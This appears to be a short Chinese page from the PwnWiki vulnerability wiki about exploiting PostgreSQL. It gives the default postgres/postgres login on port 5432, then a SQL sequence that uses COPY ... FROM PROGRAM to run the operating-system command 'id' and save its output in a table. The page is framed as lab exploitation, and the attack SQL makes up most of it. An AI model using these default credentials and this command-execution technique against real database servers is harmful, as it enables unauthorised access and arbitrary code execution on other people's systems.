免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
漏洞利用
启动漏洞环境后, 将开启Postgres默认的5432端口,默认账号密码为postgres/postgres, 连接到数据库。
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中。
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
